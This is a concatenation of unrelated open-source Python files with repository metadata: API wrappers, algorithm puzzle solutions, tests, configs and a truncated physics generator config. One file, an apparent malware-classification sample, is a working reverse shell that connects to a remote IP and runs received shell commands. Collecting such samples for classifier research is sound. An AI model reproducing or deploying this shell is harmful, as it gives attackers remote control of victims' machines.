@ProtocolInterfaces.setter
def ProtocolInterfaces(self, value):
self._set_attribute('protocolInterfaces', value)
def update(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
"""Updates a child instance of interface on the server.
Args:
Enabled (bool): If True, it gives details about the interface
MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
def add(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
"""Adds a new interface node on the server and retrieves it in this instance.
Args:
Enabled (bool): If True, it gives details about the interface
MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
Returns:
self: This instance with all currently retrieved interface data using find and the newly added interface data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the interface data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
"""Finds and retrieves interface data from the server.
All named parameters support regex and can be used to selectively retrieve interface data from the server.
By default the find method takes no parameters and will retrieve all interface data from the server.
Args:
Enabled (bool): If True, it gives details about the interface
MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
Returns:
self: This instance with matching interface data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of interface data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the interface data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
fe2c3f21e8f912cf8f5a8ca36246b60fd5ffd52d | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/dp/k_factor.py | 2fd23d18b2bb743e169249ad0c1b6c4a54e94f4d | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,425 | py | '''The K factor of a string is defined as the number of times 'abba' appears as a substring.
Given two numbers N and k, find the number of strings of length N with 'K factor' = k.
The algorithms is as follows:
dp[n][k] will be a 4 element array, wherein each element can be the number of strings of length n and 'K factor' = k which belong to the criteria represented by that index:
dp[n][k][0] can be the number of strings of length n and K-factor = k which end with substring 'a'
dp[n][k][1] can be the number of strings of length n and K-factor = k which end with substring 'ab'
dp[n][k][2] can be the number of strings of length n and K-factor = k which end with substring 'abb'
dp[n][k][3] can be the number of strings of length n and K-factor = k which end with anything other than the above substrings (anything other than 'a' 'ab' 'abb')
Example inputs
n=4 k=1 no of strings = 1
n=7 k=1 no of strings = 70302
n=10 k=2 no of strings = 74357
'''
def find_k_factor(n,k):
dp=[[[0 for i in range(4)]for j in range((n-1)//3+2)]for k in range(n+1)]
if(3*k+1>n):
return 0
#base cases
dp[1][0][0]=1;
dp[1][0][1]=0;
dp[1][0][2]=0;
dp[1][0][3]=25;
for i in range(2,n+1):
for j in range((n-1)//3+2):
if(j==0):
#adding a at the end
dp[i][j][0]=dp[i-1][j][0]+dp[i-1][j][1]+dp[i-1][j][3]
#adding b at the end
dp[i][j][1]=dp[i-1][j][0]
dp[i][j][2]=dp[i-1][j][1]
#adding any other lowercase character
dp[i][j][3]=dp[i-1][j][0]*24+dp[i-1][j][1]*24+dp[i-1][j][2]*25+dp[i-1][j][3]*25
elif(3*j+1<i):
#adding a at the end
dp[i][j][0]=dp[i-1][j][0]+dp[i-1][j][1]+dp[i-1][j][3]+dp[i-1][j-1][2]
#adding b at the end
dp[i][j][1]=dp[i-1][j][0]
dp[i][j][2]=dp[i-1][j][1]
#adding any other lowercase character
dp[i][j][3]=dp[i-1][j][0]*24+dp[i-1][j][1]*24+dp[i-1][j][2]*25+dp[i-1][j][3]*25
elif(3*j+1==i):
dp[i][j][0]=1
dp[i][j][1]=0
dp[i][j][2]=0
dp[i][j][3]=0
else:
dp[i][j][0]=0
dp[i][j][1]=0
dp[i][j][2]=0
dp[i][j][3]=0
return sum(dp[n][k])
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
2c8a4afae4e6ee567b7e3a9f144ac308b111fb97 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/string-transforms-into-another-string.py | d35a88782051531b15b00f944f7d80139f42e635 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 429 | py | # Time: O(n)
# Space: O(1)
import itertools
class Solution(object):
def canConvert(self, str1, str2):
"""
:type str1: str
:type str2: str
:rtype: bool
"""
if str1 == str2:
return True
lookup = {}
for i, j in itertools.izip(str1, str2):
if lookup.setdefault(i, j) != j:
return False
return len(set(str2)) < 26
| [
"noreply@github.com"
] | kamyu104.noreply@github.com |
00d5d5a9c614ab732e8c77cad1adba67326c87e1 | ee37f65ed9fcfeb01c9de6f1974ca2e81e940e6e | /virtue/tests/test_cli.py | 40ef95310118af49405956eb68f8611493a5b45f | [
"MIT"
] | permissive | iCodeIN/Virtue | 0d374563fdd117e0f46e9b5af9da0227118cba4a | e01963c66530d4ef8d43e0191718d123b37edab7 | refs/heads/main | 2023-03-14T23:19:08.722541 | 2020-09-12T18:00:24 | 2020-09-12T18:00:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,492 | py | from unittest import TestCase
import os
from twisted.trial.reporter import TreeReporter
from virtue import _cli
def DumbReporter():
return 12
class TestParser(TestCase):
def parse_args(self, argv):
return _cli.main.make_context("virtue", argv).params
def test_it_parses_out_tests(self):
arguments = self.parse_args(["foo", "bar", "baz"])
self.assertEqual(list(arguments["tests"]), ["foo", "bar", "baz"])
def test_it_retrieves_built_in_reporters_by_name(self):
arguments = self.parse_args(["--reporter", "tree", "foo"])
self.assertIsInstance(arguments["reporter"], TreeReporter)
def test_it_retrieves_other_reporters_by_fully_qualified_name(self):
arguments = self.parse_args(
["--reporter", "virtue.tests.test_cli.DumbReporter", "abc"],
)
self.assertEqual(arguments["reporter"], DumbReporter())
def test_stop_after(self):
arguments = self.parse_args(["-xxx", "bar", "baz"])
self.assertEqual(
(arguments["stop_after"], list(arguments["tests"])),
(3, ["bar", "baz"]),
)
def test_stop_after_default(self):
arguments = self.parse_args(["-x", "bar", "baz"])
self.assertEqual(
(arguments["stop_after"], list(arguments["tests"])),
(1, ["bar", "baz"]),
)
class TestMain(TestCase):
# TODO: these write to stdout
def test_it_exits_successfully_for_successful_runs(self):
with self.assertRaises(SystemExit) as e:
_cli.main(
[
"--reporter", "summary",
"virtue.tests.samples.one_successful_test",
],
)
self.assertEqual(e.exception.code, os.EX_OK)
def test_it_exits_unsuccessfully_for_unsuccessful_runs(self):
with self.assertRaises(SystemExit) as e:
_cli.main(
[
"--reporter", "text",
"virtue.tests.samples.one_unsuccessful_test",
],
)
self.assertNotEqual(e.exception.code, os.EX_OK)
def test_it_exits_unsuccessfully_for_unknown_reporters(self):
with self.assertRaises(SystemExit) as e:
_cli.main(
[
"--reporter", "non-existent reporter",
"virtue.tests.samples.one_unsuccessful_test",
],
)
self.assertNotEqual(e.exception.code, os.EX_OK)
| [
"Julian@GrayVines.com"
] | Julian@GrayVines.com |
1c640d2fa43898ace5b37376c3acb4cbf03661f2 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/code/Chapter 6/bookmarks/images/migrations/0002_image_total_likes.py | 323c49fd95ca00d51cdaf4961e35bfd308dabf1d | [] | no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-08 06:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('images', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='image',
name='total_likes',
field=models.PositiveIntegerField(db_index=True, default=0),
),
]
| [
"544136329@qq.com"
] | 544136329@qq.com |
48dcd7160b1610706b8ecc0b420bf892c26bb623 | f6f632bee57875e76e1a2aa713fdbe9f25e18d66 | /python/_1001_1500/1172_dinner-plate-stacks.py | c97488c27269fb1eb844a70f14dafd25248ae8de | [] | no_license | Wang-Yann/LeetCodeMe | b50ee60beeeb3661869bb948bef4fbe21fc6d904 | 44765a7d89423b7ec2c159f70b1a6f6e446523c2 | refs/heads/master | 2023-08-07T05:31:23.428240 | 2021-09-30T15:33:53 | 2021-09-30T15:33:53 | 253,497,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,429 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Rock Wayne
# @Created : 2020-07-02 08:00:00
# @Last Modified : 2020-07-02 08:00:00
# @Mail : lostlorder@gmail.com
# @Version : alpha-1.0
"""
# 我们把无限数量 ∞ 的栈排成一行,按从左到右的次序从 0 开始编号。每个栈的的最大容量 capacity 都相同。
#
# 实现一个叫「餐盘」的类 DinnerPlates:
#
#
# DinnerPlates(int capacity) - 给出栈的最大容量 capacity。
# void push(int val) - 将给出的正整数 val 推入 从左往右第一个 没有满的栈。
# int pop() - 返回 从右往左第一个 非空栈顶部的值,并将其从栈中删除;如果所有的栈都是空的,请返回 -1。
# int popAtStack(int index) - 返回编号 index 的栈顶部的值,并将其从栈中删除;如果编号 index 的栈是空的,请返回 -
# 1。
#
#
#
#
# 示例:
#
# 输入:
# ["DinnerPlates","push","push","push","push","push","popAtStack","push","push",
# "popAtStack","popAtStack","pop","pop","pop","pop","pop"]
# [[2],[1],[2],[3],[4],[5],[0],[20],[21],[0],[2],[],[],[],[],[]]
# 输出:
# [null,null,null,null,null,null,2,null,null,20,21,5,4,3,1,-1]
#
# 解释:
# DinnerPlates D = DinnerPlates(2); // 初始化,栈最大容量 capacity = 2
# D.push(1);
# D.push(2);
# D.push(3);
# D.push(4);
# D.push(5); // 栈的现状为: 2 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(0); // 返回 2。栈的现状为: 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.push(20); // 栈的现状为: 20 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.push(21); // 栈的现状为: 20 4 21
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(0); // 返回 20。栈的现状为: 4 21
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(2); // 返回 21。栈的现状为: 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.pop() // 返回 5。栈的现状为: 4
# 1 3
# ﹈ ﹈
# D.pop() // 返回 4。栈的现状为: 1 3
# ﹈ ﹈
# D.pop() // 返回 3。栈的现状为: 1
# ﹈
# D.pop() // 返回 1。现在没有栈。
# D.pop() // 返回 -1。仍然没有栈。
#
#
#
#
# 提示:
#
#
# 1 <= capacity <= 20000
# 1 <= val <= 20000
# 0 <= index <= 100000
# 最多会对 push,pop,和 popAtStack 进行 200000 次调用。
#
# Related Topics 设计
"""
import heapq
import pytest
# leetcode submit region begin(Prohibit modification and deletion)
class DinnerPlates:
"""
GOOD HARD
Use a heap queue q to find the leftmost available stack.
https://leetcode.com/problems/dinner-plate-stacks/discuss/366331/C%2B%2BPython-Two-Solutions
"""
def __init__(self, capacity: int):
self.capacity = capacity
self.q = [] # record the available stack, will use heap to quickly find the smallest available stack
# if you are Java or C++ users, tree map is another good option.
self.stacks = [] # record values of all stack of plates, its last nonempty stack are the rightmost position
def push(self, val: int) -> None:
# To push, we need to find the leftmost available position
# first, let's remove any stacks on the left that are full
# 1) self.q: if there is still available stack to insert plate
# 2) self.q[0] < len(self.stacks): the leftmost available index self.q[0] is smaller than the current size of the stacks
# 3) len(self.stacks[self.q[0]]) == self.c: the stack has reached full capacity
while self.q and self.q[0] < len(self.stacks) and len(self.stacks[self.q[0]]) == self.capacity:
# we remove the filled stack from the queue of available stacks
heapq.heappop(self.q)
# now we reach the leftmost available stack to insert
# if the q is empty, meaning there are no more available stacks
if not self.q:
# open up a new stack to insert
heapq.heappush(self.q, len(self.stacks))
# for the newly added stack, add a new stack to self.stacks accordingly
if self.q[0] == len(self.stacks):
self.stacks.append([])
# append the value to the leftmost available stack
self.stacks[self.q[0]].append(val)
def pop(self) -> int:
# To pop, we need to find the rightmost nonempty stack
# 1) stacks is not empty (self.stacks) and
# 2) the last stack is empty
while self.stacks and not self.stacks[-1]:
# we throw away the last empty stack, because we can't pop from it
self.stacks.pop()
# now we reach the rightmost nonempty stack
# we pop the plate from the last nonempty stack of self.stacks by using popAtStack function
return self.popAtStack(len(self.stacks) - 1)
def popAtStack(self, index: int) -> int:
# To pop from an stack of given index, we need to make sure that it is not empty
# 1) the index for inserting is valid and,
# 2) the stack of interest is not empty
if 0 <= index < len(self.stacks) and self.stacks[index]:
# we add the index into the available stack
heapq.heappush(self.q, index)
# take the top plate, pop it and return its value
return self.stacks[index].pop()
# otherwise, return -1 because we can't pop any plate
return -1
# Your DinnerPlates object will be instantiated and called as such:
# obj = DinnerPlates(capacity)
# obj.push(val)
# param_2 = obj.pop()
# param_3 = obj.popAtStack(index)
# leetcode submit region end(Prohibit modification and deletion)
def test_solution():
D = DinnerPlates(2) # // 初始化,栈最大容量 capacity = 2
D.push(1)
D.push(2)
D.push(3)
D.push(4)
D.push(5)
# // 栈的现状为: 2 4
# 1 3 5
# ﹈ ﹈ ﹈
assert D.popAtStack(0) == 2
# D.popAtStack(0); // 返回 2。栈的现状为: 4
# 1 3 5
#
# ﹈ ﹈ ﹈
D.push(20)
# D.push(20); // 栈的现状为: 20 4
# 1 3 5
# ﹈ ﹈ ﹈
D.push(21)
# D.push(21); // 栈的现状为: 20 4 21
# 1 3 5
# ﹈ ﹈ ﹈
assert D.popAtStack(0) == 20
# D.popAtStack(0); // 返回 20。栈的现状为: 4 21
# 1 3 5
# ﹈ ﹈ ﹈
assert D.popAtStack(2) == 21
# D.popAtStack(2); // 返回 21。栈的现状为: 4
# 1 3 5
# ﹈ ﹈ ﹈
assert D.pop() == 5
# D.pop() // 返回 5。栈的现状为: 4
# 1 3
# ﹈ ﹈
assert D.pop() == 4
# D.pop() // 返回 4。栈的现状为: 1 3
# ﹈ ﹈
assert D.pop() == 3
# D.pop() // 返回 3。栈的现状为: 1
# ﹈
assert D.pop() == 1
# D.pop() // 返回 1。现在没有栈。
assert D.pop() == -1
# D.pop() // 返回 -1。仍然没有栈。
if __name__ == '__main__':
pytest.main(["-q", "--color=yes", "--capture=no", __file__])
| [
"rock@get.com.mm"
] | rock@get.com.mm |
49ddcfdac88e151ccd52723b98147eb5ab096274 | bfcd8f1f6ac8590df321f23a422eca0370a25b8f | /myenv/bin/pyi-set_version | a3276f253e4ab124adb59f23c54ff3757e3c6917 | [] | no_license | Stephen-Tipa-Augustine/KMC_ventilator | 0567fa0b72d41fb0de11cd72c62567bed973d9f5 | 456e88ae4fff3984d5456517ba8787f9d5762745 | refs/heads/master | 2022-12-26T08:00:41.102890 | 2020-09-07T11:00:13 | 2020-09-07T11:00:13 | 293,500,282 | 0 | 1 | null | 2022-12-19T04:33:28 | 2020-09-07T10:49:08 | Python | UTF-8 | Python | false | false | 283 | #!/home/sephanayer/PycharmProjects/KMC_ventilator/myenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from PyInstaller.utils.cliutils.set_version import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"tipastep5@gmail.com"
] | tipastep5@gmail.com | |
2001d879a3c4fa86e51f452141f58291f247e5d8 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad342.py | 93d369222308b3fb6895c3732d78dc2b323386c3 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | import tarfile
import hashlib
import bz2
import crypt
import hmac
import subprocess
import socket
import zipfile
import zlib
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
a2e7dee9a0ef320ef1a4ca7ee015c89591a5713a | 7707233ec4a550f765fd28e7731f72542478cc1e | /startClient.py | cfee671263f209eef1c6a228f66fa7ad21bc2361 | [] | no_license | Angelina-Wang/518project | 6c971c7dfa34ee44961e127aba72ea9c85d8a762 | fb1056ff66eb18393b4532d6eae935ca6240f517 | refs/heads/master | 2020-09-23T10:29:33.930957 | 2020-01-13T01:01:22 | 2020-01-13T01:01:22 | 225,477,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from custom_classes import *
import sys
client = AClient()
client.connectServer(sys.argv[1])
client.restart(float(sys.argv[2]))
client.startListener()
| [
"None"
] | None |
39f8937093dcbe80de31af680dadd9de39c094e5 | 91a9f5a7afb398f4238527708cbc155dc972cbfa | /teg2/bdd_car_versions/bdd_car_6Aug2017/bair_car/nodes/runtime_parameters.py | fcabb93f3a883c1f48ad5b69ad2cf492c0088468 | [] | no_license | bddmodelcar/kzpy3.2 | cd6f9bf6b7b8b920c79b4ee36c2592b992ae4332 | b044b26649b19b240bd580feca20424a237374b1 | refs/heads/master | 2021-01-19T21:01:58.687712 | 2017-08-23T22:39:56 | 2017-08-23T22:39:56 | 101,243,308 | 0 | 1 | null | 2017-08-24T02:04:50 | 2017-08-24T02:04:50 | null | UTF-8 | Python | false | false | 3,778 | py | # This is used to specifiy caffe mode and data file name information
from kzpy3.utils2 import time_str
from kzpy3.utils2 import opjh
from kzpy3.utils2 import print_stars0
from kzpy3.utils2 import print_stars1
import os
import numpy as np
print_stars0();print(__file__);print_stars1()
computer_name = "MR_Unknown"
try:
computer_name = os.environ["COMPUTER_NAME"]
except KeyError:
print """********** Please set the environment variable computer_name ***********
e.g.,
export COMPUTER_NAME="Mr_Orange"
"""
####################### general car settings ################
#
for i in range(1):
print('*************' + computer_name + '***********')
Direct = 1.
Follow = 0.
Play = 0.
Furtive = 0.
Caf = 0.0
Racing = 0.0
Location = 'local' #Smyth_tape'
weight_file_path = opjh('pytorch_models','epoch6goodnet')
verbose = False
use_caffe = True
NETWORK = 111
I_ROBOT = 222
who_is_in_charge = I_ROBOT
robot_steer = 49
robot_motor = 49
steer_gain = 1.0
motor_gain = 1.0
acc2rd_threshold = 150
PID_min_max = [1.5,2.5]
"""
gyro_freeze_threshold = 150
acc_freeze_threshold_x = 7
acc_freeze_threshold_y_max = 15
acc_freeze_threshold_y_min = 0
acc_freeze_threshold_z = 7
motor_freeze_threshold = 55
n_avg_IMU = 10
"""
gyro_freeze_threshold = 150
acc_freeze_threshold_x = 4
acc_freeze_threshold_y_max = 13
acc_freeze_threshold_y_min = 5
acc_freeze_threshold_z = 2
motor_freeze_threshold = 55
n_avg_IMU = 10
robot_acc2rd_threshold = 10
robot_acc_y_exit_threshold = 0
torch_alt_motor = 59
#
###################################################################
####################### specific car settings ################
#
"""
if computer_name == 'Mr_Orange':
#PID_min_max = [2.,3.]
#motor_gain = 1.0
Direct = 1.
Follow = 0.
Play = 0.
Furtive = 0.
pass
if computer_name == 'Mr_Silver':
#motor_gain = 1.0
pass
if computer_name == 'Mr_Blue':
#PID_min_max = [1.5,2.5]
#motor_gain = 1.0
pass
if computer_name == 'Mr_Yellow':
#PID_min_max = [1,2]
#motor_gain = 0.9
Direct = 1.
Follow = 0.
Play = 0.
Furtive = 0.
Caf = 0.0
Racing = 0.0
pass
if computer_name == 'Mr_Black':
#PID_min_max = [1.5,2.5]
#motor_gain = 1.0
pass
if computer_name == 'Mr_White':
#motor_gain = 1.0
pass
if computer_name == 'Mr_Teal':
#motor_gain = 1.0
pass
if computer_name == 'Mr_Audi':
#motor_gain = 1.0
pass
if computer_name == 'Mr_Purple':
#motor_gain = 1.0
pass
if computer_name == 'Mr_LightBlue':
#motor_gain = 1.0
pass
#if computer_name == 'Mr_Blue_Original':
# motor_gain = 0.5
# pass
"""
#
###################################################################
# motor_gain = 1.0 # override individual settings
if Direct == 1:
task = 'direct'
elif Play == 1:
task = 'play'
elif Follow == 1:
task = 'follow'
elif Furtive == 1:
task = 'furtive'
elif Racing == 1:
task = 'racing'
else:
assert(False)
foldername = ''
if Follow == 1:
foldername = 'follow_'
model_name = weight_file_path.split('/')[-1]
if Caf == 1:
foldername = foldername + 'caffe2_' + model_name +'_'
foldername = foldername + task + '_'
foldername = foldername + Location + '_'
foldername = foldername + time_str() + '_'
foldername = foldername + computer_name
"""
#
###################################################################
# Aruco code parameters
ar_params={
'ar_motor_command' : 49, # This is the resting command for stop
'ar_max_left_steering_angle' : np.deg2rad(-130),
'ar_max_right_steering_angle' : np.deg2rad(130),
'ar_max_left_command' : 100,
'ar_max_right_command' : 0,
'ar_left_range' : 50,
'ar_right_range' : 50,
'ar_min_perceived_distance' : 9999,
'ar_critical_distance' : 0.75,
'ar_stop_distance' : 0.5,
'ar_max_motor' : 70,
'ar_min_motor' : 59,
'ar_override_motor':49,
'ar_override_steer':49 } # Full stop. Backwards is not considered
"""
| [
"karlzipser@berkeley.edu"
] | karlzipser@berkeley.edu |
fba1184cfd449adefa4e36759c3b17c04ea45157 | d8859f10ea5d4eba76230036535cdb22fb6398ba | /setup.py | 782c08fac224c86b107d7f2f3546e52e8546af76 | [
"MIT"
] | permissive | ebranlard/wiz | 322a83b0f97ad53c990cfaf26c182d02008f856a | 6dfca8b2711b670229f5b2b3b3e0d7fe0bdea156 | refs/heads/master | 2021-06-09T17:26:48.478453 | 2021-06-04T16:29:53 | 2021-06-04T16:37:04 | 181,733,068 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | from setuptools import setup, find_packages
setup(
name='wiz',
version='1.0',
description='Python library from E. Branlard',
url='http://github.com/ebranlard/wiz/',
author='Emmanuel Branlard',
author_email='lastname@gmail.com',
license='MIT',
packages=find_packages(),
zip_safe=False
)
| [
"elmanuelito.github@gmail.com"
] | elmanuelito.github@gmail.com |
86a3adb8a35c843aa7d7252b10b0f4a38d03955b | 76e51e96f663dccf9cd0f3b508dcee18996cf41b | /tests/test_Loading.py | 78222aafe313c998725b2466b5f4c631c20a5184 | [
"MIT"
] | permissive | renaiku/MHWorldData | b8d923765ee00bed08cf4d4c80b6ee88b18da1a9 | 34cf3e2d7e494e84cb48a8f14813480726019139 | refs/heads/master | 2020-03-27T22:33:12.411297 | 2018-09-03T18:41:07 | 2018-09-03T18:41:07 | 147,240,998 | 0 | 0 | MIT | 2018-09-03T18:38:14 | 2018-09-03T18:38:13 | null | UTF-8 | Python | false | false | 2,247 | py | import pytest
import os
import shutil
import json
from mhdata.io import DataReader
def save_json(obj, path):
with open(path, 'w') as f:
json.dump(obj, f)
@pytest.fixture()
def loader_mock(tmpdir):
"Returns loader pointed to a temporary directory created for the test"
return DataReader(
data_path=tmpdir,
languages=['en', 'ja']
)
def test_load_base_json(loader_mock, basedata):
path = loader_mock.get_data_path('base.json')
save_json(basedata, path)
bmap = loader_mock.load_base_json('base.json')
assert len(bmap) == len(basedata), "Expected map and base to match"
def test_load_base_json_has_auto_ids(loader_mock, basedata):
path = loader_mock.get_data_path('base.json')
save_json(basedata, path)
bmap = loader_mock.load_base_json('base.json')
idval = bmap.id_of('ja', 'test2j')
assert idval == 2, "expected auto id to have value 2"
def test_load_data_json(loader_mock, basedata, subdata):
save_json(basedata, loader_mock.get_data_path('base.json'))
save_json(subdata, loader_mock.get_data_path('data.json'))
bmap = loader_mock.load_base_json('base.json')
datamap = loader_mock.load_data_json(bmap.copy(), 'data.json')
assert len(datamap) == len(bmap), "expecting full join"
for i in range(1, len(datamap) + 1):
bmap_name = bmap[i].name('en')
assert datamap[i].name('en') == bmap_name, f"expecting names to match for entry {i}"
assert datamap[i]['data'] == bmap_name, "expected data to match the name"
def test_load_split_data_map(loader_mock, basedata, subdata):
save_json(basedata, loader_mock.get_data_path('base.json'))
split_path = loader_mock.get_data_path('split/')
os.makedirs(split_path)
save_json({ 'test2': subdata['test2']}, os.path.join(split_path, 'split1.json'))
save_json({ 'test1': subdata['test1']}, os.path.join(split_path, 'split2.json'))
bmap = loader_mock.load_base_json('base.json')
datamap = loader_mock.load_split_data_map(bmap, 'split')
assert len(datamap) == 2, "expected two entries in the data map"
names = [entry.name('en') for entry in datamap.values()]
assert names == ['test1', 'test2'], "Expected names to match in basemap order"
| [
"cfern1990@gmail.com"
] | cfern1990@gmail.com |
12c43770a03fa2dd6d1279173deb78335d2ff25a | a6a52013708c5242ea737950a7614e5585c0b1ae | /oot/upgrade/upgrade.py | 47b18fbdbc1987f0f4df408fc3bb368c4bf7d6be | [] | no_license | tegin/oot | b381ce32686965cbb7979ee44856b1f9695d23d9 | 36d372939dc5bbe65eb7106746f747a87ea29a69 | refs/heads/prod | 2021-07-06T05:09:55.472203 | 2019-11-15T12:36:21 | 2019-11-15T12:36:21 | 216,402,597 | 5 | 5 | null | 2019-11-18T08:28:31 | 2019-10-20T17:47:45 | Python | UTF-8 | Python | false | false | 1,220 | py | import importlib.util
import logging
import os
import pip._internal.main as pip
from packaging import version as packaging_version
_logger = logging.getLogger(__name__)
def upgrade(current_version, version, path, migration_package):
if current_version >= version:
return False
if os.path.exists(os.path.join(path, "requirements.txt")):
pass
pip.main(["install", "-r", os.path.join(path, "requirements.txt"), "--upgrade"])
migration_path = migration_package.__path__._path[0]
migrations = []
for vers in os.listdir(migration_path):
migration_version = packaging_version.parse(vers)
if migration_version <= version and migration_version > current_version:
migrations.append(migration_version)
migrations = sorted(migrations)
for migration in migrations:
spec = importlib.util.spec_from_file_location(
"migration",
os.path.join(migration_path, migration.base_version, "migration.py"),
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
_logger.info("Executing migration for %s" % migration.base_version)
module.migrate()
return True
| [
"etobella@creublanca.es"
] | etobella@creublanca.es |
3e2d53619ad1a420b81849bc407d615f9aa85874 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/EightTeV/TprimeTprime/TprimeTprimeToTZBWinc_M_625_TuneZ2star_8TeV-madgraph_cff.py | 0074af204c51e90e60f3bb535520fed0d2b05427 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 5,074 | py | import FWCore.ParameterSet.Config as cms
#from Configuration.Generator.PythiaUEZ2Settings_cfi import *
from Configuration.Generator.PythiaUEZ2starSettings_cfi import *
generator = cms.EDFilter("Pythia6HadronizerFilter",
pythiaHepMCVerbosity = cms.untracked.bool(False),
maxEventsToPrint = cms.untracked.int32(0),
pythiaPylistVerbosity = cms.untracked.int32(0),
comEnergy = cms.double(8000.0),
PythiaParameters = cms.PSet(
pythiaUESettingsBlock,
processParameters = cms.vstring(
'MSTP(1) = 4',
'MSEL=8 ! fourth generation (t4) fermions',
'MWID(8)=2',
'MSTJ(1)=1 ! Fragmentation/hadronization on or off',
'MSTP(61)=1 ! Parton showering on or off',
'PMAS(5,1)=4.8 ! b quark mass', #from Spring11 4000040
'PMAS(6,1)=172.5 ! t quark mass', #from Spring11 4000040
'PMAS(8,1) = 625.0D0 ! tprime quarks mass',
'PMAS(8,2) = 6.25D0',
'PMAS(8,3) = 62.5D0',
'VCKM(1,1) = 0.97414000D0',
'VCKM(1,2) = 0.22450000D0',
'VCKM(1,3) = 0.00420000D0',
'VCKM(1,4) = 0.02500000D0',
'VCKM(2,1) = 0.22560000D0',
'VCKM(2,2) = 0.97170000D0',
'VCKM(2,3) = 0.04109000D0',
'VCKM(2,4) = 0.05700000D0',
'VCKM(3,1) = 0.00100000D0',
'VCKM(3,2) = 0.06200000D0',
'VCKM(3,3) = 0.91000000D0',
'VCKM(3,4) = 0.41000000D0',
